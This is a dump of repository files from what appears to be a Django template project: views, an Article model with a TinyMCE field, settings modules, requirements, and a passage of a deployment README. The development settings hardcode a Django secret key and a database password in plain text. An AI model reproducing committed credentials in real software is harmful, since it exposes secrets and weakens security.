{\n\"npc_dota_hero_bloodseeker\",\n\"npc_dota_hero_mirana\",\n\"npc_dota_hero_nevermore\",\n\"npc_dota_hero_razor\",\n\"npc_dota_hero_storm_spirit\",\n\"npc_dota_hero_windrunner\",\n\"npc_dota_hero_zuus\",\n\"npc_dota_hero_kunkka\",\n\"npc_dota_hero_lina\",\n\"npc_dota_hero_tinker\",\n\"npc_dota_hero_sniper\",\n\"npc_dota_hero_necrolyte\",\n\"npc_dota_hero_queenofpain\",\n\"npc_dota_hero_venomancer\",\n\"npc_dota_hero_death_prophet\",\n\"npc_dota_hero_phantom_assassin\",\n\"npc_dota_hero_pugna\",\n\"npc_dota_hero_templar_assassin\",\n\"npc_dota_hero_viper\",\n\"npc_dota_hero_dragon_knight\",\n\"npc_dota_hero_leshrac\",\n\"npc_dota_hero_huskar\",\n\"npc_dota_hero_broodmother\",\n\"npc_dota_hero_alchemist\",\n\"npc_dota_hero_invoker\",\n\"npc_dota_hero_silencer\",\n\"npc_dota_hero_obsidian_destroyer\",\n\"npc_dota_hero_meepo\",\n\"npc_dota_hero_visage\",\n\"npc_dota_hero_medusa\",\n\"npc_dota_hero_ember_spirit\",\n}\noff_heroes = {\n\t\"npc_dota_hero_axe\",\n\t\"npc_dota_hero_puck\",\n\t\"npc_dota_hero_tiny\",\n\t\"npc_dota_hero_tidehunter\",\n\t\"npc_dota_hero_enigma\",\n\t\"npc_dota_hero_beastmaster\",\n\t\"npc_dota_hero_faceless_void\",\n\t\"npc_dota_hero_rattletrap\",\n\t\"npc_dota_hero_dark_seer\",\n\t\"npc_dota_hero_omniknight\",\n\t\"npc_dota_hero_enchantress\",\n\t\"npc_dota_hero_batrider\",\n\t\"npc_dota_hero_doom_bringer\",\n\t\"npc_dota_hero_brewmaster\",\n\t\"npc_dota_hero_centaur\",\n\t\"npc_dota_hero_magnataur\",\n\t\"npc_dota_hero_shredder\",\n\t\"npc_dota_hero_bristleback\",\n\t\"npc_dota_hero_abaddon\",\n\t\"npc_dota_hero_legion_commander\",\n\t\"npc_dota_hero_abyssal_underlord\",\n\t\"npc_dota_hero_pangolier\",\n}\nsupport_heroes = {\n\t\"npc_dota_hero_bane\",\n\"npc_dota_hero_crystal_maiden\",\n\"npc_dota_hero_earthshaker\",\n\"npc_dota_hero_pudge\",\n\"npc_dota_hero_sand_king\",\n\"npc_dota_hero_vengefulspirit\",\n\"npc_dota_hero_lich\",\n\"npc_dota_hero_lion\",\n\"npc_dota_hero_shadow_shaman\",\n\"npc_dota_hero_slardar\",\n\"npc_dota_hero_witch_doctor\",\n\"npc_dota_hero_riki\",\n\"npc_dota_hero_warlock\",\n\"npc_dota_hero_dazzle\",\n\"npc_dota_hero_furion\",\n\"npc_dota_hero_night_stalker\",\n\"npc_dota_hero_bounty_hunter\",\n\"npc_dota_hero_jakiro\",\n\"npc_dota_hero_chen\",\n\"npc_dota_hero_ancient_apparition\",\n\"npc_dota_hero_spirit_breaker\",\n\"npc_dota_hero_shadow_demon\",\n\"npc_dota_hero_treant\",\n\"npc_dota_hero_ogre_magi\",\n\"npc_dota_hero_undying\",\n\"npc_dota_hero_rubick\",\n\"npc_dota_hero_disruptor\",\n\"npc_dota_hero_nyx_assassin\",\n\"npc_dota_hero_keeper_of_the_light\",\n\"npc_dota_hero_wisp\",\n\"npc_dota_hero_tusk\",\n\"npc_dota_hero_skywrath_mage\",\n\"npc_dota_hero_elder_titan\",\n\"npc_dota_hero_earth_spirit\",\n\"npc_dota_hero_phoenix\",\n\"npc_dota_hero_oracle\",\n\"npc_dota_hero_techies\",\n\"npc_dota_hero_winter_wyvern\",\n\"npc_dota_hero_dark_willow\",\n}\ncarry_pool = {\n\t\"npc_dota_hero_drow_ranger\",\n\t\"npc_dota_hero_chaos_knight\",\n\t\"npc_dota_hero_juggernaut\",\n\t\"npc_dota_hero_phantom_assassin\",\n\t\"npc_dota_hero_luna\",\n\t\"npc_dota_hero_lone_druid\",\n}\nmid_pool = {\n\t\"npc_dota_hero_luna\",\n\t\"npc_dota_hero_tinker\",\n\t\"npc_dota_hero_medusa\",\n\t\"npc_dota_hero_huskar\",\n\t\"npc_dota_hero_viper\",\n\t\"npc_dota_hero_death_prophet\",\n\t\"npc_dota_hero_dragon_knight\",\n\t\"npc_dota_hero_sniper\",\n \"npc_dota_hero_templar_assassin\",\n}\noff_pool = {\n\t\"npc_dota_hero_tidehunter\",\n\t\"npc_dota_hero_bristleback\",\n\t\"npc_dota_hero_beastmaster\",\n\t\"npc_dota_hero_omniknight\",\n\t-- \"npc_dota_hero_tiny\",\n\t\"npc_dota_hero_underlord\",\n\t\"npc_dota_hero_abaddon\",\n\t\"npc_dota_hero_legion_commander\",\n}\nsupport_pool = {\n\t\"npc_dota_hero_jakiro\",\n\t\"npc_dota_hero_witch_doctor\",\n\t\"npc_dota_hero_vengefulspirit\",\n\t\"npc_dota_hero_keeper_of_the_light\",\n\t\"npc_dota_hero_bane\",\n\t\"npc_dota_hero_crystal_maiden\",\n\t\"npc_dota_hero_lich\",\n\t\"npc_dota_hero_lion\",\n\t\"npc_dota_hero_techies\",\n\t\"npc_dota_hero_ogre_magi\",\n}\n-- This is the pool of heros from which to choose bots for each position\nhero_pool_position={\n [1] = carry_pool,\n [2] = mid_pool,\n [3] = off_pool,\n [4] = support_pool,\n}\nheroes_positions = {\n\t[1] = carry_heroes,\n\t[2] = mid_heroes,\n\t[3] = off_heroes,\n\t[4] = support_heroes,\n}\nfunction Think()\n\tlocal team = GetTeam()\n\tif(GameTime()<45 and AreHumanPlayersReady(team)==false or GameTime()<25)\n\tthen\n\t\treturn\n\tend\n\n\tlocal picks = GetPicks()\n\tlocal selectedHeroes = {};\n for slot, hero in pairs(picks) do\n selectedHeroes[hero] = true;\n end\n\n\tfor i,id in pairs(GetTeamPlayers(team)) do\n\t\tif(IsPlayerInHeroSelectionControl(id) and IsPlayerBot(id) and (GetSelectedHeroName(id)==\"\" or GetSelectedHeroName(id)==nil))\n\t\tthen\n\t\t\twhile (GameTime()-pickTime)<2 do\n\t\t\t\treturn\n\t\t\tend\n\t\t\tpickTime=GameTime();\n\t\t\t\n\t\t\tlocal temphero = GetPositionedHero(team, selectedHeroes);\n\t\t\tSelectHero(id, temphero);\n\t\tend\n\tend\nend\n\nfunction UpdateLaneAssignments() \n\tlocal gamestate = GetGameState()\n\tif(gamestate==GAME_STATE_HERO_SELECTION or gamestate==GAME_STATE_STRATEGY_TIME or gamestate==GAME_STATE_TEAM_SHOWCASE or gamestate==GAME_STATE_WAIT_FOR_MAP_TO_LOAD or gamestate==GAME_STATE_WAIT_FOR_PLAYERS_TO_LOAD)\n\tthen\n\t\treturn;\n\tend\n\n\tlocal lineup = {}\n\tdual_off = false\n\taggro_tri = false\n\tfor id=1,5 do\n\t\tlocal hero = GetTeamMember(id);\n\t\tif (hero == nil) then\n\t\t\tbreak\n\t\tend\n\t\tlocal heroName = hero:GetUnitName();\n\t\t-- print(heroName)\n\t\ttable.insert(lineup,heroName)\n\t\t-- print(#lineup)\n\tend\n\n\t-- print(#lineup)\n\n\tlocal support_heroes = {}\n\tfor hero in pairs(lineup) do\n\t\tif GetHeroPosition(hero) == 1 then\n\t\t\tlocal carry_hero = hero\n\t\telseif GetHeroPosition(hero) == 2 then\n\t\t\tlocal mid_hero = hero\n\t\telseif GetHeroPosition(hero) == 3 then\n\t\t\tlocal off_hero = hero\n\t\telse\n\t\t\ttable.insert(support_heroes, hero)\n\t\tend\n\tend\n\n\t-- dual off check --\n\tif ListContains(lineup, \"npc_dota_hero_keeper_of_the_light\") then\n\t\tif (\n\t\t\tListContains(lineup, \"npc_dota_hero_beastmaster\") or \n\t\t\tListContains(lineup, \"npc_dota_hero_bristleback\") or\n\t\t\tListContains(lineup, \"npc_dota_hero_omniknight\") or\n\t\t\tListContains(lineup, \"npc_dota_hero_tiny\")\n\t\t) then\n\t\t\tdual_off = true\n\t\tend\n\tend\n\n\t-- aggro tri check --\n\tif (\n\t\tcarry_hero == \"npc_dota_hero_chaos_knight\" or\n\t\tcarry_hero == \"npc_dota_hero_phantom_assassin\" or\n\t\tcarry_hero == \"npc_dota_hero_juggernaut\"\n\t) then\n\t\taggro_tri = true\n\tend\n\n\tlocal laneTable = GetLanesTable(dual_off, aggro_tri)\n\t-- print(laneTable)\n\tlocal lanes = {1,2,3,1,1}\n\n\tfor id=1,5 do\n\t\tlocal hero = GetTeamMember(id)\n\t\tif (hero == nil) then\n\t\t\tbreak\n\t\tend\n\t\tlocal hero_name = hero:GetUnitName()\n\t\tlocal position = GetHeroPosition(hero_name)\n\t\tif position == 4 and dual_off and hero_name ~= \"npc_dota_hero_keeper_of_the_light\" then\n\t\t\tposition = position + 1\n\t\tend\n\t\tlanes[id] = laneTable[position]\n\t\t-- print(\"id\", id, \"position\", position, laneTable[position])\n\tend\n\n\tif(DotaTime()<-15)\n\tthen\n\t\t-- print(DotaTime())\n\t\treturn lanes\n\tend\n\n\tlocal safeLane = GetSafeLane()\n\tlocal offLane = GetOffLane()\n\n\tif dual_off then\n\t\tlocal lanecount = {\n\t\t\t[LANE_NONE] = 5,\n\t\t\t[LANE_MID] = 1,\n\t\t\t[offLane] = 2,\n\t\t\t[safeLane] = 2,\n\t\t};\n\telseif aggro_tri then\n\t\tlocal lanecount = {\n\t\t\t[LANE_NONE] = 5,\n\t\t\t[LANE_MID] = 1,\n\t\t\t[offLane] = 2,\n\t\t\t[safeLane] = 2,\n\t\t};\n\telse\n\t\tlocal lanecount = {\n\t\t\t[LANE_NONE] = 5,\n\t\t\t[LANE_MID] = 1,\n\t\t\t[offLane] = 1,\n\t\t\t[safeLane] = 3,\n\t\t};\n\tend\n\t\t\n\t--adjust the lane assignement when player occupied the other lane.\n\t--TODO: Assign lane at Team level not hero level.\n local playercount = 0\n\tlocal ids = GetTeamPlayers(GetTeam())\n\tfor i,v in pairs(ids) do\n\t\tif not IsPlayerBot(v) then\n\t\t\tplayercount = playercount + 1\n\t\tend\n\tend\n\tif(playercount>0)\n\tthen\n\t\tfor i=1,playercount do\n\t\t\tlocal lane = GetLane( GetTeam(),GetTeamMember( i ) )\n\t\t\tlanecount[lane] = lanecount[lane] - 1\n\t\t\tlanes[i] = lane \n\t\tend\n\t\t\n\t\tfor i=(playercount + 1), 5 do\n\t\t\tlocal hero = GetTeamMember(i);\n\t\t\tlocal heroName = hero:GetUnitName();\n\t\t\tlocal position = GetHeroPosition(heroName);\n\t\t\tlocal laneTable = GetLanesTable();\n\t\t\tlocal bestLane = laneTable[position];\n\t\t\tlocal positionAssaignedLanes = GetPositionAssaignedLanes();\n\t\t\t--try to assign the most suitable lane, if can't try other lane.\n\t\t\tif lanecount[bestLane] > 0 then\n\t\t\t\tlanes[i] = bestLane\n\t\t\t\tlanecount[bestLane] = lanecount[bestLane] - 1\n\t\t\telseif lanecount[offLane] > 0 then\n\t\t\t\tlanes[i] = offLane\n\t\t\t\tlanecount[offLane] = lanecount[offLane] - 1\n\t\t\telseif lanecount[safeLane] > 0 then\n\t\t\t\tlanes[i] = safeLane\n\t\t\t\tlanecount[safeLane] = lanecount[safeLane] - 1\n\t\t\telseif lanecount[LANE_MID] > 0 then\n\t\t\t\tlanes[i] = LANE_MID\n\t\t\t\tlanecount[LANE_MID] = lanecount[LANE_MID] - 1\n\t\t\tend\n\t\tend\n\tend\n return lanes\n\nend\n\n--index:id,value:lane Get normal lane assaignment.\nfunction GetAssaignedLanes()\n\n\tlocal laneTable = GetLanesTable();\n\tlocal lanes = {1,1,2,3,3};\n\n\tfor id=1,5 do\n\t\tlocal hero = GetTeamMember(id);\n\t\tif(hero == nil)\n\t\tthen\n\t\t\tbreak;\n\t\tend\n\t\tlocal heroName = hero:GetUnitName();\n\t\tlocal position = GetHeroPosition(heroName);\n\t\tlanes[id] = laneTable[position];\n\tend\n\treturn lanes;\nend\n\nfunction GetPicks()\n\tlocal selectedHeroes = {}\n\tfor i=0,20 do\n\t\tif (IsTeamPlayer(i)==true) then\n\t\t\tlocal hName = GetSelectedHeroName(i)\n\t\t\tif (hName ~= \"\") then\n\t\t\t\ttable.insert(selectedHeroes,hName)\n\t\t\tend\n\t\tend\n end\n return selectedHeroes;\nend\n\n-- Returns a Hero that fills a position that current team does not have filled.\nfunction GetPositionedHero(team, selectedHeroes)\n\t--Fill positions in random order\n local positionCounts = GetPositionCounts( team );\n\tlocal position\n\tlocal continue = true\n\twhile continue do\n\t\t-- print(\"start looping\")\n\t\tposition=RandomInt(1,4)\n\t\tif positionCounts[position] == 0 or (position == 4 and positionCounts[position] == 1) then\n\t\t\tcontinue = false\n\t\tend\n\tend\n\t-- print(\"End looping\", position)\n\n\treturn GetRandomHero( hero_pool_position[position], selectedHeroes );\nend\n\n-- Returns a random hero from the supplied heroPool that is not in the selectedHeroes list.\n-- Note: this function will enter an infinite loop if all heros in the pool have been selected.\nfunction GetRandomHero(heroPool, selectedHeroes)\n\tlocal hero;\n\trepeat\n\t\thero = heroPool[RandomInt(1, #heroPool)]\n\tuntil( selectedHeroes[hero] ~= true )\n return hero\nend\n\n-- For the given team, returns a table that gives the counts of heros in each position.\nfunction GetPositionCounts( team )\n local counts = { [1]=0, [2]=0, [3]=0, [4]=0 };\n local playerIds=GetTeamPlayers(team);\n\n for i,id in ipairs(playerIds) do\n\t\tlocal heroName = GetSelectedHeroName(id)\n\t\t-- print(heroName)\n if (heroName ~=\"\") then\n for position=1,4,1 do\n if ListContains( hero_pool_position[position], heroName ) then\n counts[position] = counts[position] + 1;\n end\n end\n end\n end\n\n return counts\nend\n\n-- A utilitiy function that returns true if the passed list contains the passed value.\nfunction ListContains( list, value )\n if list == nil then return false end\n for i,v in ipairs(list) do\n if v == value then\n return true\n end\n end\n return false\nend\n\n-- Returns true if, for the specified team, all the Human players have picked a hero.\nfunction AreHumanPlayersReady(team)\n\tlocal number,playernumber=0,0\n\tlocal IDs=GetTeamPlayers(team);\n\tfor i,id in pairs(IDs)\n\tdo\n if(IsPlayerBot(id)==false)\n\t\tthen\n\t\t\tlocal hName = GetSelectedHeroName(id)\n\t\t\tplayernumber=playernumber+1\n\t\t\tif (hName ~=\"\")\n\t\t\tthen\n\t\t\t\tnumber=number+1\n\t\t\tend\n\t\tend\n end\n\t\n\tif(number>=playernumber)\n\tthen\n\t\treturn true\n\telse\n\t\treturn false\n\tend\n\t\nend\n\nfunction GetSafeLane()\n\tif GetTeam() == TEAM_RADIANT\n\tthen\n\t\treturn LANE_BOT;\n\telse\n\t\treturn LANE_TOP;\n\tend\nend\n\nfunction GetOffLane()\n\tif GetTeam() == TEAM_RADIANT\n\tthen\n\t\treturn LANE_TOP;\n\telse\n\t\treturn LANE_BOT;\n\tend\nend\n\n-- Return hero's position\nfunction GetHeroPosition( heroName )\n\tif (heroName ~=\"\") then\n\t\tfor p=1,4,1 do\n\t\t\tif( ListContains( heroes_positions[p], heroName )) then\n\t\t\t\treturn p;\n\t\t\tend\n\t\tend\n\tend\n\treturn -1;\nend\n\n--index:position,value:lane.\nfunction GetLanesTable(dual_off, aggro_tri)\n\tlocal safeLane=GetSafeLane();\n\tlocal offLane=GetOffLane();\n\n\tif dual_off then\n\t\tlocal laneTable ={\n\t\t\t[1] = safeLane,\n\t\t\t[2] = LANE_MID,\n\t\t\t[3] = offLane,\n\t\t\t[4] = offLane,\n\t\t\t[5] = safeLane\n\t\t}\n\t\treturn laneTable;\n\telseif aggro_tri then\n\t\tlocal laneTable ={\n\t\t\t[1] = offLane,\n\t\t\t[2] = LANE_MID,\n\t\t\t[3] = safeLane,\n\t\t\t[4] = offLane,\n\t\t\t[5] = offLane\n\t\t}\n\t\treturn laneTable;\n\telse\n\t\tlocal laneTable ={\n\t\t\t[1] = safeLane,\n\t\t\t[2] = LANE_MID,\n\t\t\t[3] = offLane,\n\t\t\t[4] = safeLane,\n\t\t\t[5] = safeLane\n\t\t}\n\t\treturn laneTable;\n\tend\nend"
},
{
"alpha_fraction": 0.753333330154419,
"alphanum_fraction": 0.753333330154419,
"avg_line_length": 28.799999237060547,
"blob_id": "f0e3e18976ac6d13c07b0ab25f123e6928dd56f1",
"content_id": "f16c1e200e3efa63d612b7f8a8782c7cdd6d6c32",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 150,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 5,
"path": "/bot_ogre_magi.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\n\n"
},
{
"alpha_fraction": 0.6766917109489441,
"alphanum_fraction": 0.6879699230194092,
"avg_line_length": 16.799999237060547,
"blob_id": "9ddd15e97ed8cea64858b37b6a34a9820a5b2f18",
"content_id": "84064ef65bfac7886a31609386611e234ca4d22a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 266,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 15,
"path": "/ItemBuildUtility.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local X = {}\n\nfunction X.FillTalenTable(npcBot)\n\tlocal skills = {};\n\tfor i = 0, 23 \n\tdo\n\t\tlocal ability = npcBot:GetAbilityInSlot(i);\n\t\tif ability ~= nil and ability:IsTalent() then\n\t\t\ttable.insert(skills, ability:GetName());\n\t\tend\n\tend\n\treturn skills\nend\n\nreturn X;"
}
] | 56 |
PHPirates/django-template
|
https://github.com/PHPirates/django-template
|
e60f296e07477d1b28bb4fbd8f86dc6a6327e6e5
|
5ce6f17b02d6b3ecd0e1b134b36b7ca4343cee20
|
11633546ba2f80648ce336f384c09a279ecb4720
|
refs/heads/master
| 2021-07-06T14:19:46.441490 | 2021-04-08T18:22:12 | 2021-04-09T07:05:13 | 100,186,927 | 2 | 2 |
MIT
| 2017-08-13T15:42:29 | 2021-06-10T17:24:45 | 2021-06-10T17:23:21 |
Python
|
[
{
"alpha_fraction": 0.6944065690040588,
"alphanum_fraction": 0.6944065690040588,
"avg_line_length": 33.904762268066406,
"blob_id": "1522d3592fc4238e23fdf44d056eccd361b1bd43",
"content_id": "382672c7b7f676a1c2061f238e86151c88c8ad68",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 733,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 21,
"path": "/pages/views.py",
"repo_name": "PHPirates/django-template",
"src_encoding": "UTF-8",
"text": "\"\"\" This file contains the views, the 'pages' of the website. \"\"\"\nfrom django.utils import timezone\nfrom django.views import generic\n\nfrom .models import Article\n\n\n# class IndexView(generic.TemplateView):\nclass IndexView(generic.ListView):\n \"\"\"\" Index of all pages, i.e. home page. \"\"\"\n template_name = 'pages/index.html'\n # Provide name of the context variable returned by get_queryset?\n context_object_name = 'article_list'\n\n def get_queryset(self) -> None:\n \"\"\"\" Find the home article and display it. \"\"\"\n return Article.objects.filter(published_date__lt=timezone.now()).order_by('published_date')\n\n# Without a class:\n# def index(request):\n# return render(request, 'pages/index.html', context={})\n"
},
{
"alpha_fraction": 0.6611253023147583,
"alphanum_fraction": 0.6649616360664368,
"avg_line_length": 33,
"blob_id": "99ddd3ae4c4adad5ace101023deec7751bcd86d6",
"content_id": "45fa49dfa338b500ff3fd5c4180b768c353a2f2b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 782,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 23,
"path": "/pages/models.py",
"repo_name": "PHPirates/django-template",
"src_encoding": "UTF-8",
"text": "\"\"\" Models are objects used in the website. \"\"\"\nfrom django.db import models\nfrom django.utils import timezone\nfrom tinymce.models import HTMLField\n\n\nclass Article(models.Model):\n \"\"\"\" This model is an article. \"\"\"\n author = models.ForeignKey('auth.User', on_delete=models.PROTECT)\n title = models.CharField(max_length=200)\n # An HTMLField will use the TinyMCE editor, a TextField won't\n text = HTMLField()\n created_date = models.DateTimeField(default=timezone.now)\n published_date = models.DateTimeField(blank=True, null=True)\n\n def publish(self) -> None:\n \"\"\"\" Publish article now. \"\"\"\n self.published_date = timezone.now()\n self.save()\n\n def __str__(self) -> str:\n \"\"\" Python to-string method. \"\"\"\n return self.title\n"
},
{
"alpha_fraction": 0.6558441519737244,
"alphanum_fraction": 0.6558441519737244,
"avg_line_length": 21,
"blob_id": "371bfc499d74ff3ce8282b61d18834fceee028c6",
"content_id": "ddf4a85d16651173e5cecae5af1d1cdea3c48b47",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 154,
"license_type": "permissive",
"max_line_length": 43,
"num_lines": 7,
"path": "/pages/apps.py",
"repo_name": "PHPirates/django-template",
"src_encoding": "UTF-8",
"text": "\"\"\" This file is here to register apps. \"\"\"\nfrom django.apps import AppConfig\n\n\nclass HomeConfig(AppConfig):\n \"\"\" Register app. \"\"\"\n name = 'pages'\n"
},
{
"alpha_fraction": 0.6458333134651184,
"alphanum_fraction": 0.6532738208770752,
"avg_line_length": 23,
"blob_id": "807c081836619ba3dcd974e8ce5819f07bc117f2",
"content_id": "228d7b8cf34fd6568644c0b4194eb7cb0696fbf4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 672,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 28,
"path": "/mysite/settings/production.py",
"repo_name": "PHPirates/django-template",
"src_encoding": "UTF-8",
"text": "\"\"\"\nSECURITY WARNING Keep these settings secret, they are for production.\n\"\"\"\n\nfrom mysite.settings.base import *\n\nSECRET_KEY = 'mykey'\n\nSTATIC_ROOT = os.path.join(BASE_DIR, \"static\")\n\nDEBUG = False\n\n# Settings for database on deployment server\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'django_template_db',\n 'USER': 'django_template',\n 'PASSWORD': 'databasepassword',\n 'HOST': 'server ip address',\n 'PORT': '5432',\n }\n}\n\n# Settings for serving with https\nSESSION_COOKIE_SECURE = True\nSESSION_COOKIE_HTTPONLY = True\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTOCOL', 'https')\n"
},
{
"alpha_fraction": 0.49504950642585754,
"alphanum_fraction": 0.7029703259468079,
"avg_line_length": 16,
"blob_id": "6f9d3bfa9c3670e519204d97154cda072dc8c93e",
"content_id": "4fe84c35881128f29903d637354c71aaad994126",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 101,
"license_type": "permissive",
"max_line_length": 21,
"num_lines": 6,
"path": "/requirements.txt",
"repo_name": "PHPirates/django-template",
"src_encoding": "UTF-8",
"text": "Django==3.1.8\nmysqlclient==1.4.6\nwheel==0.33.6\ngunicorn==20.0.4\npsycopg2==2.8.4\ndjango-tinymce==2.8.0"
},
{
"alpha_fraction": 0.6052173972129822,
"alphanum_fraction": 0.6278260946273804,
"avg_line_length": 25.136363983154297,
"blob_id": "e1b3c65d7ccbf6d4511b4cdbb22b7d7f5ba9f070",
"content_id": "6444f12f64a2a09d9755487236ba13687b022def",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 575,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 22,
"path": "/mysite/settings/development.py",
"repo_name": "PHPirates/django-template",
"src_encoding": "UTF-8",
"text": "\"\"\" Settings for development purposes. \"\"\"\nfrom mysite.settings.base import *\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '(mk5n7s)#kozir!hh7crys^qj%b-gs@nt@9rk*@x!8dg8j9o=='\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\n# Database\n# https://docs.djangoproject.com/en/1.11/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql',\n 'NAME': 'django_template_db',\n 'USER': 'django_template',\n 'PASSWORD': 'IcoXGoOqJ',\n 'HOST': '127.0.0.1',\n 'PORT': '5432',\n }\n}\n"
},
{
"alpha_fraction": 0.7446845173835754,
"alphanum_fraction": 0.7577083706855774,
"avg_line_length": 100.22491455078125,
"blob_id": "3662afd92f11a9936073d68de4a838637391e698",
"content_id": "055c8890d1a407fc156bfc023b1f4e94ebe90df4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 29254,
"license_type": "permissive",
"max_line_length": 808,
"num_lines": 289,
"path": "/readme.md",
"repo_name": "PHPirates/django-template",
"src_encoding": "UTF-8",
"text": "[](https://scrutinizer-ci.com/g/PHPirates/django-template/build-status/master)\n[](https://scrutinizer-ci.com/g/PHPirates/django-template/?branch=master)\n[](https://www.codacy.com/app/PHPirates/django-template?utm_source=github.com&utm_medium=referral&utm_content=PHPirates/django-template&utm_campaign=Badge_Grade)\n[](https://codeclimate.com/github/PHPirates/django-template/maintainability)\n\n# Django template project and deployment tutorial\n\n### Makes use of\n\n#### For the website:\n* PostgreSQL\n* The [TinyMCE](https://www.tinymce.com/) editor\n* HTML templates\n* CSS\n* Directory structure from [docs.djangoproject.com](https://docs.djangoproject.com/en/1.11/intro/tutorial01/).\n\n#### For deployment:\n* A PostgreSQL database\n* gunicorn to serve the website\n* nginx to 'reverse proxy' requests from outside to gunicorn\n* PyCharm for local and remote development\n* supervisor to manage gunicorn\n\nThis guide has been tested a lot of times on Ubuntu 16.04, 18.04, Raspbian Buster and even Arch Linux.\n\n## Table of Contents\n- [Instructions to run the website locally](#instructions-to-run-the-website-locally)\n * [Setting up postgres locally](#setting-up-postgres-locally)\n- [Deploying on an Ubuntu server](#deploying-on-an-ubuntu-server)\n * [Buy the necessary services](#buy-the-necessary-services)\n * [Setting up users and login](#setting-up-users-and-login)\n * [Firewall and fail2ban](#firewall-and-fail2ban)\n * [Local setup](#local-setup)\n * [Setting up postgres](#postgres)\n * [Setting up a virtual environment](#setting-up-a-virtual-environment)\n * [Uploading project](#uploading-project)\n * [Installing dependencies](#installing-dependencies)\n * [Setting up gunicorn](#setting-up-gunicorn)\n * [Setting up supervisor](#setting-up-supervisor)\n * [Setting up nginx](#setting-up-nginx)\n * [Setting up HTTPS](#setting-up-https)\n * [Start nginx](#start-nginx)\n + [Setting up automatic renewal of https certificates](#setting-up-automatic-renewal-of-https-certificates)\n * [<a name=\"remember\">To remember</a>](#-a-name--remember--to-remember--a-)\n + [Django files](#django-files)\n + [Django models](#django-models)\n + [Static files](#static-files)\n + [Supervisor config](#supervisor-config)\n + [gunicorn start script](#gunicorn-start-script)\n + [nginx config](#nginx-config)\n + [logs](#logs)\n\n\n# Instructions to run the website locally\n\n1. Create a project either by creating a new Django project in PyCharm and then copying the files from this project or by downloading this template project directly.\n1. Probably you want to use a virtual environment.\n1. Check that the packages in requirements.txt are installed, on Windows you may need to download the `mysqlclient` package from [lfd.uci.edu](http://www.lfd.uci.edu/~gohlke/pythonlibs/#mysql-python) selecting the right bits version for you python (you can check that by starting ``python``), copy it to the project location, check there with `pip -V` that you are using the pip of the virtual environment and then run `pip install mysqlclient-1.3.13-cp37-cp37m-win32.whl`. On Linux you can download a `mysqlclient` package from your distro's package repo, you also need `gcc`.\n1. If you use PyCharm, you can make a Django Server run configuration (instead of running `runserver` all the time). Add an environment variable with name `DJANGO_SETTINGS_MODULE` and value `mysite.settings.development`, assuming the settings are in `development.py` in a folder `settings` in the folder `mysite`. The development settings are for development on your local computer, production settings are for production on the server.\n1. Tip: If you try running with `DEBUG=False` on your local computer, Django won't serve your static files for you since this is only meant for in production.\n1. Possibly you need to select your Python interpreter.\n\n#### Setting up postgres locally\n1. To use a database locally, do the following. On Linux you can also not use pgAdmin but do everything via the command line, just continue to set up postgres like below and then go the instructions linked there.\n 1. Install PostgreSQL (go to the website on Windows, use your package manager on Linux) \n 1. Install pgAdmin (these instructions were tested on Windows with pgAdmin 4 2.0 and on Arch Linux with pgAdmin 4 4.1) or use the command prompt PostgreSQL tools for the next steps\n 1. On Windows:\n 1. To create a user, right-click on PostgreSQL and choose create Login/Group Role, give it for example the name of your project.\n 1. Create a database by right-clicking on Databases, give it a name for example myproject_db, and under the 'security' tab grant all privileges to the user you just created.\n 1. On Linux (tested on Arch Linux, on other distros commands may differ)\n 1. Switch to the postgres user with `sudo su postgres`\n 1. Initialize postgres with `initdb --locale en_US.UTF-8 -D '/var/lib/postgres/data'`\n 1. Switch back to your own user (or open a new terminal window)\n 1. Start the postgresql service with `sudo systemctl start postgresql` and `sudo systemctl enable postgresql`\n 1. Change to a directory which `psql` can access, like `cd /tmp`\n 1. Either use pgAdmin, or reuse the way of working from the server: do the first part of the [postgres section](#postgres) below (until you exit psql) now. If you use pgAdmin:\n 1. Create a server with a name like `mysite_server` and host name `127.0.0.1` and user postgres, empty password.\n 1. Right click on Login/Group Roles and Create a Role, name it something like `mysite_user` and under Privileges give it the login privilege.\n 1. If you get the error `'psycopg2.extensions.Column' object has no attribute '_asdict'` then you have a version mismatch between psycopg2 and pgAdmin, probably psycopg2 is newer than your pgAdmin version (e.g. pgAdmin4 4.4 and psycopg2 2.8.2 will not work). Try updating everything (for newer pgAdmin version you can search online) and if it doesn't help use the command line (link above) to continue.\n 1. Create a database by right-clicking on Databases, give it a name for example myproject_db, select as owner mysite_user and under the 'security' tab add a privilege with grantee mysite_user, grant all privileges to the user you just created.\n 1. Replace name, user and password in `DATABASES` in your settings file.\n \n1. Use edit | find | replace in path to replace all references to 'mysite' to our own project name. Also rename the 'mysite' module (take care to be consistent with 